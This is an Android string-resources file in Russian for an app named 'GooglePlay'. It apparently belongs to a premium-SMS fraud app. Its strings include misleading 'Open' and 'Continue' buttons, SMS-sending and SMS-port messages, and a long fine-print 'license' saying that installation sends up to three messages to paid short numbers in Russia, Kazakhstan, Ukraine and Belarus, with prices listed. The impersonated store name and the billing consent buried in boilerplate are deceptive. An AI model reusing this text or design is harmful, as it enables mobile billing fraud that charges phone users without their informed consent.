<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">GooglePlay</string>
    <string name="rules_menu">Правила в меню</string>
    <string name="megafon_rules"><u>Услуга платная. Информация для абонентов.</u></string>
    <string name="read_off">Правила</string>
    <string name="i_accept">Открыть</string>
    <string name="i_accept_off">Продолжить</string>
    <string name="act_done">Установка завершена!</string>
    <string name="off_text">textextextext</string>
    <string name="main_text">Вы согласны с условиями загрузки</string>
    <string name="error_sms_sending">Не удалось отправить SMS</string>
    <string name="please_wait">Пожалуйста, подождите…</string>
    <string name="d_f">Загрузить Файл</string>
    <string name="back_off">Назад</string>
    <string name="rules_text">Пользовательское соглашение</string>
    <string name="exit">Выход</string>
    <string name="attention">Услуга платная, не более</string>
    <string name="rub">р с НДС</string>
    <string name="error_net">Не обнаружено активное подключение к Интернету. Пожалуйста, включите соединение с Интернетом и перезапустите приложение.</string>
    <string name="agree_rules">С правилами согласен</string>
    <string name="dialog_no_button">Нет</string>
    <string name="thanks">Благодарим за активацию! Ссылка на ваш файл:</string>
    <string name="full_off_text">"Пожалуйста, внимательно прочтите нижеследующий текст перед тем, как начать установку предлагаемого программного обеспечения на ваше абонентское устройство и пользование услугами!
 Лицензионное соглашение об оказании услуг с использованием объекта интеллектуальной собственности – программного обеспечения Installator module, версия v1.5-2012.
 Лицензионное соглашение (основные положения).
 
 Продолжение процесса установки программного продукта означает ваше согласие с правилами, имеющими силу публичной оферты (ст. 437 Гражданского кодекса Российской Федерации), текст которых опубликован ниже (содержит основные положения Правил; полный текст правил доступен по следующему URL-адресу: http://depositmobi.com/conditions.html
 
 Настоящий программный продукт, загружаемый Вами на абонентское устройство, включая любые официальные дополнения к нему, является результатом интеллектуальной деятельности, охраняемым в соответствии с гражданским законодательством Российской Федерации или нормами применимого законодательства соответствующих иностранных государств (для пользователей сетей подвижной радиотелефонной связи иностранных государств). Настоящий программный продукт предоставляется Вам (конечному пользователю) по не исключительной лицензии на настоящих условиях. Программный продукт предоставляется на возмездной основе. Программный продукт является инсталляционным модулем (приложением), обеспечивающим доступ к сервисам интернет-ресурса depositmobi.com. Интернет-ресурс depositmobi.com является сервисом обмена файлами и ссылками на файлы-приложения для абонентских станций (мобильных телефонов, коммуникаторов и иных аналогичных устройств, работающих под управлением операционных систем, поддерживающих выполнение скриптов Java2me, а также Android). Сервис позволяет абоненту после регистрации на интернет-ресурсе без ограничений использовать функции поиска и загрузки приложений для абонентских станций. Оферент гарантирует одновременную доступность на сайте не менее 25 приложений и не менее 10 активных URL-ссылок на файлы, расположенные на других файловых хранилищах или иных аналогичных web-площадках, имеющих потребительскую ценность по заключению отдела маркетинга оферента. Регистрация на указанном сервисе производится путём установки на абонентскую станцию настоящего программного продукта, который в процессе инсталляции (установки) производит обмен сообщениями электросвязи с цифровыми идентификаторами (сервисными номерами) сети вашего оператора. В процессе регистрации Вас в качестве пользователя сервиса производится отправка до трёх сообщений электросвязи на цифровые идентификаторы, имеющие premium-тарификацию. Устанавливая и используя настоящий программный продукт, Вы даёте оференту согласие на, в том числе, передачу в тексте отправляемых на цифровые идентификаторы сообщений электросвязи сведений о технических параметрах используемой Вами абонентской станции с целью дальнейшего предоставления Вам совместимых приложений или ссылок на совместимые приложения. В процессе установки может производиться соединение со следующими цифровыми идентификаторами (в зависимости от общей нагрузки на соответствующие цифровые идентификаторы): 6151, 7151, 8151, 9151, 2858, 2855, 7155, 3858, 3855, 7255. Стоимость услуги (лицензии на один экземпляр программного продукта) составляет 1062 рублей (включая НДС). В случае, если в процессе установки производится соединение с цифровыми идентификаторами меньшей стоимости, оферент предоставляет пользователю скидку в размере разницы между стоимостью услуги и общей стоимостью установленных соединений между Модулем SIM абонента и цифровыми идентификаторами. Для абонентов ОАО «МегаФон» услуга предоставляется после успешной тарификации соединения, установленного между модулем SIM абонента и одним цифровым идентификатором сети ОАО «МегаФон» из перечисленных в настоящей оферте. Сумма скидки предоставляется на каждую лицензию, выплате в денежной форме не подлежит. Абонентам оператораTele2 услуга не предоставляется. Пожалуйста, подробно ознакомьтесь с полным текстом публичной оферты до использования сервиса! http://depositmobi.com/conditions.html
 Для получения доступа к контенту вы должны согласиться с условиями, представленными ниже. Ниже представлен текст соглашения-оферты между сервисом http://depositmobi.ru/ и Абонентом.
 
 1. Для получения доступа к предоставляемому сервисом http://depositmobi.ru/ контенту необходимо произвести оплату путем отправки до 3-х СМС-сообщений.
 2. Администрация http://depositmobi.ru/ не несет никакой ответственности за любой прямой или косвенный ущерб, возникший в результате использования приложения, включая упущенную прибыль и понесенные убытки.
 3. При первом запуске приложений http://depositmobi.ru/ запрашивается разрешение на передачу регистрационных данных на сервера http://depositmobi.ru/ с использованием ПЛАТНОГО короткого номера:
 
 Для Казахстана:
 Сервис доступен на всей территории РК
 Стоимость любого исходящего SMS-сообщения на номер 9684 – 177.68 тенге для абонентов всех Операторов включая НДС.
 Стоимость любого исходящего SMS-сообщения на номер 9685 – 400.89 тенге для абонентов всех Операторов включая НДС.
 Стоимость любого исходящего SMS-сообщения на номер 9683 – 535.71 тенге для абонентов всех Операторов включая НДС.
 Для всех абонентов сетей GSM: K’Cell, ActiV, Beeline, NEO, Dalacom, Pathword.
 В случае ошибочного запроса на короткий номер 9683, система не уведомит об ошибке, но услуга будет считаться оказанной, и денежные средства за SMS будут списаны с лицевого счета мобильного телефона.
 При возникновении вопросов, связанных с работоспособностью сервиса, следует обращаться в службу поддержки: help@zerogravity.kz , +7 (727) 356-79-56
 Zero Gravity и http://depositmobi.ru/ не несут ответственности за сбои в работе операторов сотовой связи.
 После отправки SMS, Вы даёте своё согласие получать SMS уведомления от компании http://depositmobi.ru/.
 Факт пользования сервисом подразумевает согласие пользователя с настоящими условиями
 http://depositmobi.ru/ и Zero Gravity оставляет за собой право вносить любые изменения и/или дополнения в настоящие правила в период оказания услуг пользователям.
 Подробная информация на сайте: zerogravity.kz
 
 Для Украины:
 Для абонентов национальных GSM-операторов Украины оплата производится путем отправки 2 смс-сообщений на произвольное сочетание любых из указанных коротких номера: 4129 (50 гривен), 4128 (30 гривен), 4127 (16 гривен), 4126 (9 гривен). Стоимость указана с НДС. Дополнительно удерживается налог в Пенсионный Фонд Украины в размере 7.5% от стоимости смс-сообщения без НДС. Услуга оказывается только для совершеннолетних. Технический партнер: ООО АйФри Украина, адрес: 03124, г. Киев, ул. Н.Василенко, 7А., телефон службы поддержки: 044 545 77 03, стоимость звонков оплачивается согласно тарифов операторов связи, e-mail: support@i-free.com.ua
 
 Для Беларуси:
 Отправка смс на короткий номер 3311, стоимость 19900руб. для абонентов всех операторов, без налогов
 
 Для России:
 Отправка до 3-х СМС-сообщений на сервисные номера:
 - 1151 (Мегафон 34.75 руб., МТС 35.88 руб., Билайн 37.29 руб., Tele2 34.70 руб., около 38 руб. с НДС для остальных операторов) включая НДС.
 - 7151 (МТС 42.34 руб., Мегафон 40.00 руб., Билайн 40.00 руб., Tele2 40.12 руб., около 40 руб. с НДС для остальных операторов) включая НДС.
 - 7375 (МТС 35.00 руб., Билайн 35.00 руб., Мегафон 35.00 руб., Tele2 35.00 руб., около 35 руб. с НДС для остальных операторов) включая НДС.
 - 1899 (Билайн 65.91 руб., Tele2 76.00 руб., Мегафон 94.00 руб., МТС 63.14 руб., около 70 руб. с НДС для остальных операторов) включая НДС.
 - 6365 (МТС 75.00 руб., Билайн 77.77 руб., Мегафон 75.00 руб., Tele2 75.00 руб., около 75 руб. с НДС для остальных операторов) включая НДС.
 - 9151 (МТС 135.12 руб., Билайн 130.00 руб., Мегафон 135.00 руб., Tele2 125.08 руб., около 120 руб. с НДС для остальных операторов) включая НДС.
 - 9999 (МТС 99.99 руб., Билайн 99.99 руб., Мегафон 99.99 руб., Tele2 99.99 руб., около 100 руб. с НДС для остальных операторов) включая НДС.
 - 1161 (Билайн 110.17 руб., Tele2 94.70 руб., Мегафон 125.00 руб., МТС 94.71 руб., около 110 руб. с НДС для остальных операторов) включая НДС.
 - 7781 (Мегафон 150.00 руб., Билайн 144.07 руб., МТС 172.20 руб., Tele2 173.00 руб., около 170 руб. с НДС для остальных операторов) включая НДС.
 - 2855 (Мегафон 236.00 руб., Билайн 200.00 руб., МТС 240.00 руб., Tele2 236.00 руб., около 240 руб. с НДС для остальных операторов) включая НДС.
 - 7155 (Мегафон 236.00 руб., Билайн 200.00 руб., МТС 240.00 руб., Tele2 236.00 руб., около 240 руб. с НДС для остальных операторов) включая НДС.
 - 2858 (Билайн 200.00 руб., Tele2 200.60 руб., Мегафон 200.60 руб., МТС 203.20 руб., около 200 руб. с НДС для остальных операторов) включая НДС.
 Отправка до 2-х СМС-сообщений на сервисный номер:
 - 3855 (Билайн 300 руб., Мегафон 354.00 руб., МТС 304.79 руб., Tele2 249.99 руб., около 360 руб. с НДС для остальных операторов) включая НДС.
 - 4481 (Мегафон 254.24 руб., Билайн 254.24 руб., МТС 258.30 руб., Tele2 211.86 руб., около 250 руб. с НДС для остальных операторов) включая НДС.
 - 7255 (Билайн 300 руб., Мегафон 354.00 руб., МТС 304.79 руб., Tele2 249.99 руб., около 360 руб. с НДС для остальных операторов) включая НДС.
 Общая стоимость услуги составляет не более 600 рублей.
 Стоимость услуг для абонентов МегаФон не превышает 600 рублей.
 Для абонентов МТС, Билайн и Мегафон услуга предоставляется после отправки 1 смс на любой из сервисных номеров.
 
 Для оператора ЕТК:
 1151 - Енисей Телеком 236 руб. (RUR) с НДС
 1161 - Енисей Телеком 95 руб. (RUR) с НДС
 1899 - Енисей Телеком 65 руб. (RUR) с НДС
 4481 - Енисей Телеком 228.81. (RUR) с НДС
 2855 - Енисей Телеком 236 руб. (RUR) с НДС
 6666 - Енисей Телеком 177 руб. (RUR) с НДС
 7781 - Енисей Телеком 145 руб. (RUR) с НДС
 6365 - Енисей Телеком 75 руб. (RUR) с НДС
 7375 - Енисей Телеком 35 руб. (RUR) с НДС
 9999 - Енисей Телеком 99.99 руб. (RUR) с НДС
 9151 - Енисей Телеком 125.08 руб. (RUR) с НДС
 8916 - Енисей Телеком 350 руб. (RUR) с НДС
 7151 - Енисей Телеком 40.12 руб. (RUR) с НДС
 4. Пользователь вправе отказать в передаче регистрационных данных. В таком случае приложения http://depositmobi.ru/ остаются неактивированными.
 5. Передача регистрационных данных является единоразовой процедурой.
 6. Администрация http://depositmobi.ru/ не несет никакой ответственности за попытки повторных запусков приложения и их последующую активацию. Повторный запуск и повторная активация является необязательной процедурой активации приложения. Администрация http://depositmobi.ru/ не рассматривает жалобы, касаемые повторных запусков и активаций.
 7. Администрация http://depositmobi.ru/ не несет никакой ответственности за содержание приложений, доступ к которым оплачивается через приложение http://depositmobi.ru/. Вся ответственность за содержание приложений лежит на владельце контента, доступ к которому оплачивается с использованием приложения http://depositmobi.ru/.
 8. В случае обнаружения спама или иных запрещенных методов распространения приложений, Администрация просит уведомлять о таких случаях в Службу поддержки Абонентов Контент-Провайдера через веб-сайт: support@sms911.ru с обязательным указанием ID приложения.
 9. Абонент вправе обжаловать процедуру списания средств со счета в случаях, если заявленный в названии и описании контент не был предоставлен после успешной активации приложения. Для этого необходимо обратиться в Службу поддержки Абонентов через веб-сайт: http://www.sms911.ru с обязательным указанием ID приложения.
 
 Для активации приложения необходимо разрешить отправку запроса с использованием платного короткого номера. Полную информацию о тарифах вы можете получить на веб-сайте: http://www.sms911.ru/."</string>
    <string name="port_sms">Получено SMS на порт с адреса</string>
    <string name="apps_dir_wasnt_created">Ошибка создания папки приложений. Вы не сможете загружать файлы.</string>
</resources>
